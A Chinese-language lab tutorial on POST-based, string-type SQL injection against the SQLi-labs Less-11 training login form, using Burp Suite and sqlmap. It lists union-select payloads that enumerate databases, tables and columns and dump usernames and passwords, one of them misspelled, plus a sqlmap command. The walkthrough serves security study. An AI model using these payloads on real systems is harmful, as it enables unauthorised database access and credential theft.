【less-11】基于SQLI的POST字符型SQL注入
实验声明:本实验教程仅供研究学习使用,请勿用于非法用途,违者一律自行承担所有风险! 基于SQLI的POST字符型SQL注入
- 实验目的
- 实验环境
- 实验原理
- 实验步骤
- 第一步 判断是够存在POST型注入点
- 第二步 判断是否存在字符型/数字型注入
- 第三步 POST手工注入
- 思考与总结
实验目的
通过本实验理解区别SQL注入中GET和POST的区别,掌握POST型SQL注入漏洞的手工注入方法,熟悉Burpsuite软件的使用。
实验环境
渗透平台:Kali
目标网站:SQLI平台上的Less-11
实验原理
1.POST方式概述
使用 POST 方式提交数据,注入点位置在 POST 数据部分,常发生在表单中。
2.GET和POST的区别:
语义上的区别,get用于获取数据,post用于提交数据。
GET - 从指定的资源请求数据。
POST - 向指定的资源提交要被处理的数据
get参数有长度限制(受限于url长度,具体的数值取决于浏览器和服务器的限制),而post无限制
3.如何判断是否存在POST注入
主要是判断输入框是否存在注入,直接输入一个 '看是否报错(如果存在盲注的话也是不会报错的),如果直接出错了,说明存在注入漏洞,如果没有,那么还需要进一步确定。如果页面有多个输入框,这时要分别确定是否都存在注入漏洞。
实验步骤
第一步 判断是够存在POST型注入点
(1)访问目标网站的Less-11
(2)在Firefox浏览器中按F12,查浏览器前端表单提交元素可以看到用户名和密码两个参数分别为uname和passwd
(3)以admin/cc尝试登录,显示报错
(4)以admin/admin尝试登录,会将登录成功结果反馈在前端页面
第二步 判断是否存在字符型/数字型注入
(1)uname=1&passwd=1 或者 uname=1&passwd=1" 此时提示登录失败(回显正常)
(2)uname=1&passwd=1’ 此时提示错误,得出结论是单引号的字符型注入
从报错信息可以推测出数据库的查询语句有可能是如下形式:
select username,password from table_name where username='$_POST['uname']' and password='$_POST['passwd']' limit 0,1
可在目标网站查看源码得知:传入的参数username、password是用单引号引起来的,而且使用and来进行组合
第三步 POST手工注入
(1)在burpsuit抓取到的包里面利用union语句联合查询来获取用户名和数据库名 uname=1&passwd=1’ union select user(),database()–+
此时可以在浏览器前端获取相应的用户名和数据库名
(2)在burpsuit抓取到的包里面利用union语句联合查询来获取表名
uname=1&passwd=1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security'--+
此时可以在浏览器前端获取到表名信息
在burpsuit抓取到的包里面利用union语句联合查询来获取字段名
uname=1&passwd=1' union select 1,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'--+
此时可以在浏览器前端获取相应的字段名
可参考以下语句进行其他信息的猜解:
猜解列数:
XXXXX order by 2#&passwd=1
获取数据库,用户:
XXXXX union select database(),user() #&passwd=1
获取表名:
XXXXX union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #&passwd=1
获取一条数据:
XXXXX union select 1,table_name from information_schema.tables where table_schema=database() limit 0,1 #&passwd=1
获取全部数据:
XXXXX union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #&passwd=1
获取一条数据:
XXXXX union select 1,column_name from information_schema.columnes where table_name='users' limit 0,1 #&passwd=1
获得列值:
获取全部数据:
XXXXX union select group_concat(username),group_concat(password) from users #&passwd=1
获取一条数据:
XXXXX union select username,password from users limit 0,1 #&passwd=1
第四步 结合SQLMap软件与Burpsuit的抓包信息进行工具注入
(1)以test/test登录Less-11,然后burpsuit抓包并保存到aa.txt文档
(2)打开sqlmap,开始进行注入,所用的命令为:
sqlmap -r aa.txt --dbs
注意:aa.txt文档的保存路径下执行命令或者把aa.txt的路径指定完整!
此时成功获取数据库信息:
然后分别使用sqlmap的其他参数来进行SQL注入即可。
思考与总结
通过本次实验,成功实现了POST型SQL注入,掌握了基于手工方法和利用sqlmap软件结合burpsuite抓包来进行SQL注入的方法,深刻体会了SQL注入的思考和流程,加深了对SQL注入漏洞的理解。
【less-11】基于SQLI的POST字符型SQL注入相关推荐
- SQL注入——基于联合查询的字符型GET注入(三)
本章目的 普及字符型GET注入的原理和特点,掌握利用联合查询(unionselect)的方法实现SQL注入的基本流程. 实验环境 攻击机:Pentest-Atk (1)操作系统:Windows10 ( ...
- SOL注入——基于联合查询的数字型GET注入(二)
本章目的 普及数字型GET注入的原理和特点,掌握利用联合查询(unionselect)的方法实现SQL注入的基本流程. 实验环境 攻击机:Pentest-Atk (1)操作系统:Windows10 ( ...
- 报错型sql注入原理分析
0x00:前言 关于sql注入,经久不衰,现在的网站一般对sql注入的防护也相对加强了,2016年的***测试报告中,出现最多的是xss(跨站脚本***)和明文传输等,但是对sql注入的利用方式,也相 ...
- 基于AST抽象语法树的SQL注入检测 (2) -- 每周小结(01-02~01-08) - .Little Hann
本周继续学习AST的SQL语法检测原理的学习,文章的接下来部分准备分为2部分进行学习: 1. SQL注入语法防御规则 2. druid中SQL注入防御模块sql-wall 1. 相关学习资料 http ...
- 基于Gpio的Linux字符型驱动设计--…
流水灯Linux驱动步骤 第一步:编写字符设备驱动 第二步:加载 第三步:编写应用程序测试设备驱动 第一步:编写流水灯Linux驱动 在/linux-3.2/driver/char/sep4020_ ...
- sql注入基于错误-单引号-字符型
查找注入点 在url中: 1. ' 2. and 1=1/and 1=2 3. 随即输入(整形) 4. -1/+1回显上下页面(整形) 5. and sleep(5) (判断页面返回时间) 判断有多少 ...
- 山东大学软件学院项目实训-创新实训-山大软院网络攻防靶场实验平台(七)-SQL注入字符型
目录 前言: 一.简介 二.项目配置 三.代码编写 四.运行测试 前言: 前面完成了 SQL 注入漏洞的数字型输入,其实 SQL 注入漏洞还有很多其他类型的注入,例如:字符型注入.宽字节注入等,相应的 ...
- 墨者靶场-SQL手工注入漏洞测试(MySQL数据库-字符型)
0x00 前言 我们都知道,SQL注入分数字型和字符型,我们上次讲的是最基本的数字型SQL注入,这次我们就来讲最基本的字符型SQL注入.同样,如果是明白原理和方法的话,看懂这篇文章并不难,但是如果不清 ...
- 黑客学习-SQL注入(字符型):Hackbar获取网站账号和密码
SQL注入用户通过浏览器或者其他客户端将恶意SQL语句插入到网站参数中,网站应用程序未经过过滤,将恶意SQL语句带入数据库进行执行,通过数据库获取了敏感的信息或者执行了其他恶意操作. 由于SQL语句本 ...
最新文章
- Foreach与Random
- matlab 一个赋值变量赋值,MATLAB 基本语法----变量与赋值
- 找出两列表的共有元素python_python 找出两个dataframe中不同的元素
- tez-site.xml_数字支付系统的未来-Google Tez和音频快速响应
- python使用proxy
- Android 功耗优化(3)---Android后台调度与省电
- 解决pip2安装不成功的问题
- html 5实用特性之data属性
- xgboost分类原理
- es6 babel编译
- paip.提升用户体验---提示语
- 英飞凌TC297 PSPR与DSPR
- 教师计算机考核有啥用,教师计算机使用管理制度和考核方案
- 考研操作系统【1.5 操作系统引导与虚拟机】
- Fixing DSDT
- 上门回收废品的app
- OpenGL圆柱面绘制贴图
- 核酸检测软件开发方案
- JUC基础(一): 什么是JUC(JUC概述)
- MTK 虚拟 sensor bring up (pick up) sensor1.0